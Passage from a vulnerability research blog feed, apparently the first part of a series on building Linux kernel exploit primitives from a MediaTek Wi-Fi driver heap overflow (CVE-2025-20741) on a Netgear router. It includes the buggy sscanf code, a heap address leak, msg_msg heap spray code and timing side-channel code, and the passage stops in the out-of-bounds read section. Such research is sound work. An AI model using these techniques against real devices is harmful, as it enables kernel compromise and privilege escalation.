<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="4.4.1">Jekyll</generator><link href="https://blog.coffinsec.com/feed.xml" rel="self" type="application/atom+xml" /><link href="https://blog.coffinsec.com/" rel="alternate" type="text/html" /><updated>2026-04-03T17:45:16+00:00</updated><id>https://blog.coffinsec.com/feed.xml</id><title type="html">hyprblog</title><subtitle>Vulnerability research, software development, and other technobabble.</subtitle><author><name>hyper</name></author><entry><title type="html">kernel alchemy pt. 1: developing exploit primitives with CVE-2025-20741</title><link href="https://blog.coffinsec.com/0day/2026/04/02/kernel-alchemy-pt1.html" rel="alternate" type="text/html" title="kernel alchemy pt. 1: developing exploit primitives with CVE-2025-20741" /><published>2026-04-02T00:00:00+00:00</published><updated>2026-04-02T00:00:00+00:00</updated><id>https://blog.coffinsec.com/0day/2026/04/02/kernel-alchemy-pt1</id><content type="html" xml:base="https://blog.coffinsec.com/0day/2026/04/02/kernel-alchemy-pt1.html"><![CDATA[<p>This post picks up where the last one left off and will use a couple of the bugs in the mt7622
driver as starting points to develop kernel exploit primitives on the Netgear WAX206. We’ll work
through <code class="language-plaintext highlighter-rouge">msg_msg</code> heap grooming, OOB reads via header corruption, function pointer hijacking through
<code class="language-plaintext highlighter-rouge">seq_operations</code>, and page-level read/write via <code class="language-plaintext highlighter-rouge">pipe_buffer</code> corruption.</p>

<h2 id="introduction">introduction</h2>

<p>Hello again! I hope you all had a bit of fun with <a href="https://blog.coffinsec.com/0days/2025/12/15/more-like-mediarekt-amirite.html">my last post</a> going over the details of all of
the bugs I reported to MediaTek last year and the <em>interesting</em> behavior from their triage team. I
left you all on a bit of a cliff-hanger last time so let’s get to the real fun and talk about
exploitation.</p>

<p>Having 20+ bugs to start with is pretty sweet since it provides a lot of opportunities to explore
different exploit strategies and learn about kernel exploitation in general. Considering this was my
first time exploiting real-world kernel bugs, the journey from bug to full-chain exploit wasn’t
immediately clear so I spent quite a bit of time experimenting with different techniques to get
familiar with kernel internals and build up a toolkit of primitives that I could eventually use for
a full exploit. Rather than jumping straight to the finished exploits, this post is going to focus
on the primitives themselves: what can be built from two common starting points — a heap overflow
and a heap address leak — and how those building blocks combine to create increasingly powerful
capabilities.</p>

<p>We’ll work through:</p>

<ul>
  <li><a href="#msg_msg-101">kernel heap grooming with <code class="language-plaintext highlighter-rouge">msg_msg</code></a></li>
  <li><a href="#timing-side-channels-to-improve-heap-grooming-reliability">timing side-channels for page boundary detection</a></li>
  <li><a href="#tech-oob-read-via-msg_msgm_ts-field-corruption">tech: OOB read via <code class="language-plaintext highlighter-rouge">msg_msg</code> header corruption</a></li>
  <li><a href="#tech-arbitrary-address-readfree-via-msg_msgnext-pointer-corruption">tech: arbitrary read+free via <code class="language-plaintext highlighter-rouge">msg_msg.next</code> pointer corruption</a></li>
  <li><a href="#tech-seq_operations-function-pointer-corruption">tech: <code class="language-plaintext highlighter-rouge">seq_operations</code> function pointer corruption</a></li>
  <li><a href="#tech-page-level-rw-via-pipe_bufferpage-corruption">tech: page-level read/write via <code class="language-plaintext highlighter-rouge">pipe_buffer.page</code> corruption</a> (PageJack-inspired)</li>
</ul>

<p>To be clear, none of these techniques are novel — they’ve all been documented in various writeups
and exploits over the years. The hope is that putting them together here with a focus on the
individual primitive components rather than in the context of a full exploit chain will be useful as
a reference or for getting ideas for use in your own exploits. All of the techniques are
demonstrated using the Mediatek bugs, but the concepts are generic; the same primitives apply to any
heap overflow in the SLUB allocator. A follow-up post will walk through full exploit chains that
leverage these primitives to achieve local privilege escalation.</p>

<p>The primitives described in this post were developed over a couple of months of experimentation on
the Netgear WAX206 with no kernel debugger; just a root shell, <code class="language-plaintext highlighter-rouge">dmesg</code>, and a lot of trial and
error. It was tough, but the constrained environment <em>definitely</em> made the process educational: many
of the techniques required building an intuitive understanding of allocator behavior by observing
crashes, reading through kernel code, and trying to reason about what the kernel was doing under the
hood. Talk about a baptism by fire.</p>

<p>Anyway, let’s get started! It’s gonna be a long one (again).</p>

<h2 id="background">background</h2>

<h3 id="starting-assumptions">starting assumptions</h3>

<p>Everything in this post builds on two primitives:</p>

<ol>
  <li><strong>A heap overflow</strong> into a known slab cache with attacker-controlled data</li>
  <li><strong>A heap address leak</strong> pointing to controlled data</li>
</ol>

<p>These are common enough starting points; many real-world kernel bugs provide one or both.
Luckily, the collection of bugs we’re working with has both, though even without the heap address
leak to start with a couple of these primitives could still be leveraged successfully with some
minor tweaks.</p>

<h3 id="the-bugs">the bugs</h3>

<h4 id="cve-2025-20741-heap-overflow-in-vie_oper_proc">CVE-2025-20741: heap overflow in vie_oper_proc()</h4>

<p>This is the heap overflow used as the starting point for the techniques in this post. See the
<a href="/0days/2025/12/15/more-like-mediarekt-amirite.html">previous post</a> for a full RCA, but here are the key properties:</p>

<ul>
  <li>The <code class="language-plaintext highlighter-rouge">vie_oper_proc()</code> handler parses a user-supplied command string using <code class="language-plaintext highlighter-rouge">sscanf()</code> with a <code class="language-plaintext highlighter-rouge">%s</code> format specifier into a heap-allocated buffer <code class="language-plaintext highlighter-rouge">ctnt</code></li>
  <li>The buffer is allocated using an incorrect size calculation that results in it landing in the <code class="language-plaintext highlighter-rouge">kmalloc-128</code> slab cache</li>
  <li>Since <code class="language-plaintext highlighter-rouge">sscanf("%s", ...)</code> doesn’t enforce any length limit, the write is effectively unbounded</li>
</ul>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="c1">// allocation ends up in kmalloc-128 due to buggy sizeof() usage</span>
    <span class="n">os_alloc_mem</span><span class="p">(</span><span class="n">pAd</span><span class="p">,</span> <span class="p">(</span><span class="n">UCHAR</span> <span class="o">**</span><span class="p">)</span><span class="o">&amp;</span><span class="n">ctnt</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">((</span><span class="n">MAX_VENDOR_IE_LEN</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="mi">2</span><span class="p">));</span>

    <span class="c1">// sscanf parses unbounded string into heap buffer — overflow</span>
    <span class="n">sscanf</span><span class="p">(</span><span class="n">arg</span><span class="p">,</span>
        <span class="s">"%d-frm_map:%x-oui:%6s-length:%d-ctnt:%s"</span><span class="p">,</span>
        <span class="o">&amp;</span><span class="n">oper</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">frm_map</span><span class="p">,</span> <span class="n">oui</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">length</span><span class="p">,</span> <span class="n">ctnt</span><span class="p">);</span>
</code></pre></div></div>

<p>One constraint from the <code class="language-plaintext highlighter-rouge">sscanf()</code> parsing: <strong>no NULL bytes or whitespace</strong>. <code class="language-plaintext highlighter-rouge">sscanf()</code> also
appends a NULL terminator after the data, which means there’s always an extra zero byte written at
the end of the overflow. Something to work around, but not a showstopper.</p>

<p>The overflow lands in <code class="language-plaintext highlighter-rouge">kmalloc-128</code>, which on the target device is shared by a number of interesting
kernel objects due to the lack of smaller general-purpose caches: <code class="language-plaintext highlighter-rouge">msg_msg</code> structs,
<code class="language-plaintext highlighter-rouge">seq_operations</code>, and others. The unlimited write size gives a lot of room to experiment with
different corruption targets.</p>

<p>Note: this bug requires <code class="language-plaintext highlighter-rouge">CAP_NET_ADMIN</code> to trigger (<code class="language-plaintext highlighter-rouge">iwpriv set</code>), which makes it unsuitable for an
unprivileged LPE. It’s used here purely as a convenient bug for demonstrating the techniques.</p>

<h4 id="rtmpioctlmac-heap-address-leak">RTMPIoctlMAC(): heap address leak</h4>

<p>The <code class="language-plaintext highlighter-rouge">RTMPIoctlMAC()</code> function handles the <code class="language-plaintext highlighter-rouge">iwpriv &lt;iface&gt; mac</code> debug command. During execution, it
prints a log message to <code class="language-plaintext highlighter-rouge">dmesg</code> containing the kernel heap address of the user-supplied argument
buffer:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>RTMPIoctlMAC():after trim space, ptr len=27, pointer(ffffffc01690b000)=feedface=...
</code></pre></div></div>

<p>The leaked address points to a buffer containing data we control. With one operation we get:</p>

<ol>
  <li>controlled data written at a kernel heap address</li>
  <li>that address leaked back to us</li>
</ol>

<p>Even without KASLR, heap addresses are difficult to predict given the constant churn of kernel
allocations. This primitive provides the known heap address that several of the techniques below
require.</p>

<h3 id="target-specific-notes">target-specific notes</h3>

<p>The techniques in this post were developed on a <strong>Netgear WAX206</strong> (MediaTek MT7622, ARM64, Linux
4.4.198, SLUB allocator). A few characteristics of this target are worth noting up front since they
influence some of the implementation details:</p>

<ul>
  <li><strong>No KASLR</strong>: kernel symbol addresses are computable from the kernel image + known load address.
Infoleaks are still useful for heap addresses, but symbol addresses (e.g. for function pointer
targets) are known statically via <code class="language-plaintext highlighter-rouge">/proc/kallsyms</code> + kernel image.</li>
  <li><strong>No <code class="language-plaintext highlighter-rouge">CONFIG_SLAB_FREELIST_RANDOM</code></strong>: slab allocations are sequential, making heap grooming more
reliable and freelist corruption straightforward.</li>
  <li><strong>No <code class="language-plaintext highlighter-rouge">CONFIG_SLAB_FREELIST_HARDENED</code></strong>: freelist pointers are stored as plain addresses — no
obfuscation to deal with.</li>
  <li><strong>No <code class="language-plaintext highlighter-rouge">CONFIG_CHECKPOINT_RESTORE</code></strong>: <code class="language-plaintext highlighter-rouge">MSG_COPY</code> flag for <code class="language-plaintext highlighter-rouge">msgrcv()</code> is unavailable, which affects
how <code class="language-plaintext highlighter-rouge">msg_msg</code> sprays can be safely inspected (discussed in the foundations section).</li>
  <li><strong><code class="language-plaintext highlighter-rouge">kmalloc-128</code> is the smallest general-purpose cache</strong>: objects smaller than 128 bytes without a
dedicated cache all land here, which means <code class="language-plaintext highlighter-rouge">seq_operations</code> (32 bytes) and other potential target
objects share the cache with the vulnerable buffer overflowed by the <code class="language-plaintext highlighter-rouge">vie_oper_proc</code> bug. This
cache is also very noisy (~700+ active slabs), requiring larger sprays to reliably control the
slab layout.</li>
  <li><strong><code class="language-plaintext highlighter-rouge">dmesg</code> is world-readable</strong>: allows unprivileged access to the <code class="language-plaintext highlighter-rouge">RTMPIoctlMAC()</code> heap address
leak.</li>
</ul>

<p>On a modern hardened kernel, some of these techniques would need additional work: KASLR bypasses
(e.g. like other infoleak bugs, which we happen to have anyway :)), freelist pointer deobfuscation,
cross-cache strategies, etc. Still, the underlying concepts are the same.</p>

<h2 id="foundations-kernel-heap-grooming">foundations: kernel heap grooming</h2>

<p>When it comes to exploiting any heap-based bug the first place to start is usually establishing
heap grooming primitives. This is a foundational capability that most heap exploits rely on since
creating a predictable heap layout makes exploitation more reliable, and many techniques require the
ability to trigger allocs/frees at specific points in time.</p>

<p>So, let’s talk about <code class="language-plaintext highlighter-rouge">msg_msg</code>.</p>

<h3 id="msg_msg-101">msg_msg 101</h3>

<p>If you’ve ever looked into Linux kernel exploitation you’re probably already familiar but for those
who aren’t, the idea is simple: you can use the System V message queue API to force controlled
allocations and frees in kernel slab caches. Every time you send a message to a queue with
<code class="language-plaintext highlighter-rouge">msgsnd()</code>, the kernel allocates a <code class="language-plaintext highlighter-rouge">msg_msg</code> struct on the heap; every time you read it back with
<code class="language-plaintext highlighter-rouge">msgrcv()</code>, the allocation is freed. This gives us a userspace-controlled mechanism for triggering
kernel allocations of varying sizes with controlled data that we can later free on-demand, the two
fundamental operations that are needed for reliable heap grooming.</p>

<p>With the basic concept covered, let’s go over a few key details. The <code class="language-plaintext highlighter-rouge">msg_msg</code> struct looks like
this (from <a href="https://elixir.bootlin.com/linux/v4.4.198/source/include/linux/msg.h#L39" target="_blank"><code class="language-plaintext highlighter-rouge">include/linux/msg.h</code></a>):</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">msg_msg</span> <span class="p">{</span>
    <span class="k">struct</span> <span class="n">list_head</span> <span class="n">m_list</span><span class="p">;</span>   <span class="c1">// +0x00: linked list pointers (prev, next)</span>
    <span class="kt">long</span> <span class="n">m_type</span><span class="p">;</span>               <span class="c1">// +0x10: message type</span>
    <span class="kt">size_t</span> <span class="n">m_ts</span><span class="p">;</span>               <span class="c1">// +0x18: message text size</span>
    <span class="k">struct</span> <span class="n">msg_msgseg</span> <span class="o">*</span><span class="n">next</span><span class="p">;</span>   <span class="c1">// +0x20: pointer to next segment (for large msgs)</span>
    <span class="kt">void</span> <span class="o">*</span><span class="n">security</span><span class="p">;</span>            <span class="c1">// +0x28: security pointer</span>
    <span class="cm">/* message body follows immediately at +0x30 */</span>
<span class="p">};</span>
</code></pre></div></div>

<p>The struct header is <code class="language-plaintext highlighter-rouge">0x30</code> (48) bytes and the message body is placed immediately after it in the
same allocation. This means the total allocation size is the body size plus 48 bytes, and <em>that</em>
determines which slab cache the message lands in. If we want to target <code class="language-plaintext highlighter-rouge">kmalloc-128</code> we can send a
message with a body of ~80 bytes or less (80 + 48 = 128). For <code class="language-plaintext highlighter-rouge">kmalloc-256</code>, a body between 80-176
bytes will do it. This is one of the things that makes <code class="language-plaintext highlighter-rouge">msg_msg</code> so useful: by controlling the body
size, we can target whichever cache we want (up to <code class="language-plaintext highlighter-rouge">kmalloc-4096</code>).</p>

<p>For messages larger than the maximum message size (4096 bytes minus the 48-byte header), the kernel
splits the data across <code class="language-plaintext highlighter-rouge">msg_msgseg</code> segments, each one being a separate allocation with just an
8-byte header (<code class="language-plaintext highlighter-rouge">next</code> pointer) and the rest being message data. This turns out to be useful too,
since you still get an elastic grooming primitive but with more controlled data taking up the body
of the allocation. We’ll come back to this later.</p>

<p>The basic grooming flow goes something like this:</p>

<ol>
  <li><strong>Spray</strong>: create a bunch of message queues and send one message per queue, sized to land in the
target slab cache. The goal is to fill up existing partial slabs and force the allocator to give
us fresh slabs where we control every object.</li>
  <li><strong>Poke holes</strong>: free a subset of those messages (e.g., every other one) by reading them back from
their queues. This creates gaps in the slab layout at predictable positions.</li>
  <li><strong>Trigger the bug</strong>: the vulnerable allocation fills one of the holes we created. If the grooming
went well, this allocation is now adjacent to a <code class="language-plaintext highlighter-rouge">msg_msg</code> struct we still own (or some other
target object we want to corrupt with the overflow that’s been allocated into one of the open
slots).</li>
</ol>

<p>This is the basic recipe, and it’s more or less the same pattern used by every technique in
this post.</p>

<h3 id="tuning-heap-sprays">tuning heap sprays</h3>

<p>One of the goals of spraying is to get data put into fresh slabs where you control every object, so
you can predict exactly what’s adjacent to what. If the spray is too small, you end up just filling
existing partial slabs that share space with random kernel allocations you don’t control, so
figuring out the right size for the sprays matters.</p>

<p>How many messages that takes depends on how busy the target cache is. On a busy cache (e.g. like
<code class="language-plaintext highlighter-rouge">kmalloc-128</code> when it’s the smallest general-purpose cache on the system) you might need 1000+
messages to exhaust the existing partial slabs and force fresh ones. Less contended caches may only
need a fraction of that. Depending on the target environment, timing side-channels can also be used
to try to detect new page allocations for better spray alignment (see the next section).</p>

<p>CPU pinning with <code class="language-plaintext highlighter-rouge">sched_setaffinity()</code> is also useful for improving the reliability of heap sprays.
Pinning to a single core means the exploit will consistently hit the same per-cpu slab cache, which
reduces a source of unpredictability. The SLUB allocator keeps per-cpu caches which are pulled from
first and must be exhausted before the allocator will allocate fresh slabs. Dealing with a single
CPU’s allocations vs. 4 or 8 makes it much easier to get reliable heap behavior across runs.</p>

<h3 id="timing-side-channels-to-improve-heap-grooming-reliability">timing side-channels to improve heap grooming reliability</h3>

<p>As mentioned briefly above, it’s possible to use timing side-channels to detect when the kernel
allocator has been forced to make an allocation through the buddy/page allocator (i.e. when it is
allocating a completely fresh slab). With some tuning for the target system, this can be used to
reliably detect page/slab boundaries.</p>

<p>The tl;dr on how this works is that once the allocator has completely exhausted all of the existing
partial slabs (both per-cpu and per-node) it must call into the page allocator to request a fresh
page to service the next slab. This is the slowest path for allocations (the per-cpu and per-node
freelists are meant to mitigate this impact) and the latency is usually measurable from userspace
using <code class="language-plaintext highlighter-rouge">clock_gettime()</code> around each allocation to measure execution time.</p>

<p>Implementing this is pretty simple: collect timing measurements before and after each allocation
call you trigger, then compute the mean time and loop through the time measurements to detect
outliers that deviate from the mean by a certain amount (used 1.4 in the example below but tuning
this value for the target system is necessary). Each of these outliers is likely to be an allocation
on a fresh slab, with the outliers near the tail of the spray being the most accurate.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// compute the number of slots remaining in the active slab after a spray based on the number of</span>
<span class="c1">// objects sprayed and the index in the spray where the last page boundary was detected</span>
<span class="k">static</span> <span class="kr">inline</span> <span class="kt">uint32_t</span> <span class="nf">spray_delta_to_page_boundary</span><span class="p">(</span><span class="kt">uint32_t</span> <span class="n">last_pg_idx</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">spray_size</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">slots_per_slab</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">last_pg_idx</span> <span class="o">+</span> <span class="mi">15</span> <span class="o">==</span> <span class="n">spray_size</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">return</span> <span class="p">(</span><span class="n">last_pg_idx</span> <span class="o">+</span> <span class="n">slots_per_slab</span> <span class="o">-</span> <span class="n">spray_size</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">inline</span> <span class="kt">long</span> <span class="nf">timespec_diff_ns</span><span class="p">(</span><span class="k">struct</span> <span class="n">timespec</span> <span class="o">*</span><span class="n">start</span><span class="p">,</span> <span class="k">struct</span> <span class="n">timespec</span> <span class="o">*</span><span class="n">end</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">return</span> <span class="p">(</span><span class="n">end</span><span class="o">-&gt;</span><span class="n">tv_sec</span> <span class="o">-</span> <span class="n">start</span><span class="o">-&gt;</span><span class="n">tv_sec</span><span class="p">)</span> <span class="o">*</span> <span class="mi">1000000000L</span> <span class="o">+</span> <span class="p">(</span><span class="n">end</span><span class="o">-&gt;</span><span class="n">tv_nsec</span> <span class="o">-</span> <span class="n">start</span><span class="o">-&gt;</span><span class="n">tv_nsec</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">spray</span><span class="p">()</span> <span class="p">{</span>
    <span class="p">...</span>
    <span class="kt">long</span> <span class="n">timings</span><span class="p">[</span><span class="n">NUM_MSGS</span><span class="p">];</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">NUM_MSGS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">clock_gettime</span><span class="p">(</span><span class="n">CLOCK_MONOTONIC</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">start</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">msgsnd</span><span class="p">(</span><span class="n">qids</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">msg</span><span class="p">,</span> <span class="n">body_size</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">fatal</span><span class="p">(</span><span class="s">"failed to send message %d"</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="n">clock_gettime</span><span class="p">(</span><span class="n">CLOCK_MONOTONIC</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">end</span><span class="p">);</span>
        <span class="n">timings</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">timespec_diff_ns</span><span class="p">(</span><span class="o">&amp;</span><span class="n">start</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">end</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="cm">/* Compute mean */</span>
    <span class="kt">long</span> <span class="n">sum</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">NUM_MSGS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
        <span class="n">sum</span> <span class="o">+=</span> <span class="n">timings</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
    <span class="kt">double</span> <span class="n">mean</span> <span class="o">=</span> <span class="p">(</span><span class="kt">double</span><span class="p">)</span><span class="n">sum</span> <span class="o">/</span> <span class="p">(</span><span class="n">NUM_MSGS</span><span class="p">);</span>

    <span class="cm">/* Flag outliers (&gt;1.4x mean = suspected new slab page allocation) */</span>
    <span class="kt">double</span> <span class="n">outlier_mult</span> <span class="o">=</span> <span class="mi">1</span><span class="p">.</span><span class="mi">4</span><span class="p">;</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Suspected slow-path hits (&gt;%.1fx mean of %.0f ns) ---</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">outlier_mult</span><span class="p">,</span> <span class="n">mean</span><span class="p">);</span>
    <span class="kt">int</span> <span class="n">last_outlier_idx</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">NUM_MSGS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">timings</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&gt;</span> <span class="n">outlier_mult</span> <span class="o">*</span> <span class="n">mean</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">last_outlier_idx</span> <span class="o">=</span> <span class="n">i</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="n">last_outlier_idx</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This information can be used to determine how many slots were filled in the last page that was
sprayed into and how many additional allocations will completely fill the slab. The only real
requirement for this to work is that the spray used to collect the timings must be large enough to
ensure that fresh pages <em>will</em> be allocated (the timing measurements for allocations that happened
in partial slabs are basically useless). In practice, I found that running the timed sprays after
already having sprayed a large number of allocations to pre-fill the partial slabs made the timing
measurements much more reliable.</p>

<h3 id="about-the-msg_copy-flag">about the MSG_COPY flag</h3>

<p><code class="language-plaintext highlighter-rouge">MSG_COPY</code> is a flag for <code class="language-plaintext highlighter-rouge">msgrcv()</code> that makes it possible to peek at a message without actually
dequeuing it. Most kernel exploits that use <code class="language-plaintext highlighter-rouge">msg_msg</code> heap grooming rely heavily on <code class="language-plaintext highlighter-rouge">MSG_COPY</code> for
stability: it lets you safely validate that corruption landed correctly and generally inspect the
state of the sprayed messages without destroying them in the process.</p>

<p>Without <code class="language-plaintext highlighter-rouge">MSG_COPY</code>, every call to <code class="language-plaintext highlighter-rouge">msgrcv()</code> is a one-way trip: the message is unlinked from the
queue and freed. This is a problem for exploits that corrupt <code class="language-plaintext highlighter-rouge">msg_msg</code> metadata (like some of the
ones described in this post) since <code class="language-plaintext highlighter-rouge">msgrcv()</code> will dereference the message’s <code class="language-plaintext highlighter-rouge">m_list</code> pointers
during the unlinking step – if those addresses don’t point to valid writable memory, the kernel
panics and the attempt fails. Even with valid addresses there are still a number of side effects
that can end up crashing things before the exploit can get very far.</p>

<p><code class="language-plaintext highlighter-rouge">MSG_COPY</code> is only available if the kernel is built with <code class="language-plaintext highlighter-rouge">CONFIG_CHECKPOINT_RESTORE</code>, which not all
kernels have (the target used for this post does not). Thankfully, there are a couple of techniques
that can be used to work around these issues.</p>

<p>First, instead of sending multiple messages into a single queue during the spray, create a queue for
every message and only send a single message per queue. This way, searching through the sprayed
messages doesn’t require traversing a linked list of messages where bad pointers might get hit.</p>

<p>Second, once you’ve identified the corrupted message and finished doing whatever you’re going to do
with it (e.g. use it to leak kernel memory), don’t allow the exploit process to exit normally.
Interrupting the process and hard-terminating causes the cleanup that would normally flush the
remaining messages from the queue and trigger dangerous frees on potentially corrupted pointers to
be skipped, which can reduce instability and crashes from the side-effects of freeing bad pointers.
<em>This technique applies even when <code class="language-plaintext highlighter-rouge">MSG_COPY</code> is available</em> because the messages will still get
free’d eventually when the exploit process exits (assuming it takes the graceful exit path).</p>

<h3 id="code-walkthrough-of-the-grooming-sequence">code walkthrough of the grooming sequence</h3>

<p>Now that the key details for <code class="language-plaintext highlighter-rouge">msg_msg</code> have been covered, let’s spend a moment talking about
how this gets implemented in practice. All of the techniques below use a variation of the
same heap spraying strategy so it’s best to explain it here once and then highlight any important
adjustments made for individual techniques.</p>

<p>During the initial development phase I created the following set of wrapper functions to make
initializing queues and setting up the sprays a bit easier. They’re very simple:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">init_msgq()</code>: creates <code class="language-plaintext highlighter-rouge">cnt</code> number of message queues where the actual messages will be written</li>
  <li><code class="language-plaintext highlighter-rouge">msgq_spray()</code>: send messages of <code class="language-plaintext highlighter-rouge">size</code> bytes into <code class="language-plaintext highlighter-rouge">numqs</code> queues (i.e. spray messages)</li>
  <li><code class="language-plaintext highlighter-rouge">msgq_spray_mark()</code>: a variation on <code class="language-plaintext highlighter-rouge">msgq_spray()</code> that marks each message with a unique
  marker value in its body to use as a sort of cookie value so corrupted messages could be identified</li>
  <li><code class="language-plaintext highlighter-rouge">msgq_open_holes*()</code>: open “holes” in the sprayed regions by reading messages back from the
  queues. a couple of variations are used but the most common is reading back from every other
  queue so that the opened slots are all adjacent to the other <code class="language-plaintext highlighter-rouge">msg_msg</code> objects</li>
</ul>

<p>I won’t list the code for each of these functions here since they’re pretty trivial but take a look
at the linked <a href="https://github.com/mellow-hype/mtk-kernel-alchemy" target="_blank">Github repo</a> with the exploits if you’re interested in the implementation details.</p>

<p>This is how the functions are typically used in the examples:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="c1">// step 1: create MSG_COUNT message queues</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"create message queues: (%d)"</span><span class="p">,</span> <span class="n">MSG_COUNT</span><span class="p">);</span>
    <span class="n">init_msgq</span><span class="p">(</span><span class="n">qids_1</span><span class="p">,</span> <span class="n">MSG_COUNT</span><span class="p">);</span>

    <span class="c1">// step 2: spray MSG_COUNT messages, 1 message per queue</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"spray primary messages"</span><span class="p">);</span>
    <span class="n">msgq_spray_mark</span><span class="p">(</span><span class="n">qids_1</span><span class="p">,</span> <span class="n">MSG_COUNT</span><span class="p">,</span> <span class="n">dummy</span><span class="p">,</span> <span class="n">ORIG_BODY_SIZE</span><span class="p">);</span>

    <span class="c1">// step 3: open holes in the sprayed region by reading back the message from every other queue</span>
    <span class="c1">// in the range that was sprayed so that the open slots all sit adjacent to allocated messages</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"poke holes in primary messages"</span><span class="p">);</span>
    <span class="n">msgq_open_holes_even</span><span class="p">(</span><span class="n">qids_1</span><span class="p">,</span> <span class="n">MSG_COUNT</span><span class="p">,</span> <span class="n">MTYPE_ORIG</span><span class="p">,</span> <span class="n">ORIG_BODY_SIZE</span><span class="p">);</span>
</code></pre></div></div>

<p>After the three steps above are complete, the layout of the slab where the messages are allocated
ends up looking something like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># after step 2: msg_msg fill the slab
&lt;msg_msg&gt; | &lt;msg_msg&gt; | &lt;msg_msg&gt; | &lt;msg_msg&gt; | &lt;msg_msg&gt; | &lt;msg_msg&gt; | &lt;msg_msg&gt; | &lt;msg_msg&gt;

# after step 3: alternate holes in sprayed messages
&lt;msg_msg&gt; |  &lt;HOLE&gt;   | &lt;msg_msg&gt; |  &lt;HOLE&gt;   | &lt;msg_msg&gt; |  &lt;HOLE&gt;   | &lt;msg_msg&gt; |  &lt;HOLE&gt;
</code></pre></div></div>

<p>This heap layout is ideal for using an overflow to target <code class="language-plaintext highlighter-rouge">msg_msg</code> objects themselves but it can
easily be adapted for targeting other objects by opening up multiple slots right next to each other
so that target objects and vulnerable objects (e.g. overflowed buffers) get allocated next to
each other. Different approaches are needed for different exploit strategies but the grooming
primitives <code class="language-plaintext highlighter-rouge">msg_msg</code> provides are super flexible so it’s usually possible to make things work once
you’ve got a feel for how the allocator behaves on the target.</p>

<h2 id="exploring-the-technique-space">exploring the technique space</h2>

<p>With the foundations in place, let’s move on to talking about what can be accomplished with just a
heap overflow and heap address leak as a starting point. The code for each of the techniques
discussed below can be found <a href="https://github.com/mellow-hype/mtk-kernel-alchemy" target="_blank">here</a>.</p>

<h3 id="tech-oob-read-via-msg_msgm_ts-field-corruption">tech: OOB read via msg_msg.m_ts field corruption</h3>

<p><strong>PoC: <code class="language-plaintext highlighter-rouge">primitives-dev-vie/vie-oper-minimal-msgmsg-leak-v2.c</code></strong></p>

<p>One of the cool things we can do with <code class="language-plaintext highlighter-rouge">msg_msg</code> that isn’t just heap spraying is to combine it with
a heap overflow bug to get an OOB read primitive and leak kernel data. If we can overflow into an
adjacent <code class="language-plaintext highlighter-rouge">msg_msg</code> in memory and corrupt the <code class="language-plaintext highlighter-rouge">m_ts</code> (message text size) field with a large value,
then when <code class="language-plaintext highlighter-rouge">msgrcv()</code> reads that message back, it’ll read past the end of the message and leak
whatever is adjacent in the slab.</p>

<p>This is a common starting technique in kernel exploitation and a good first primitive to build from
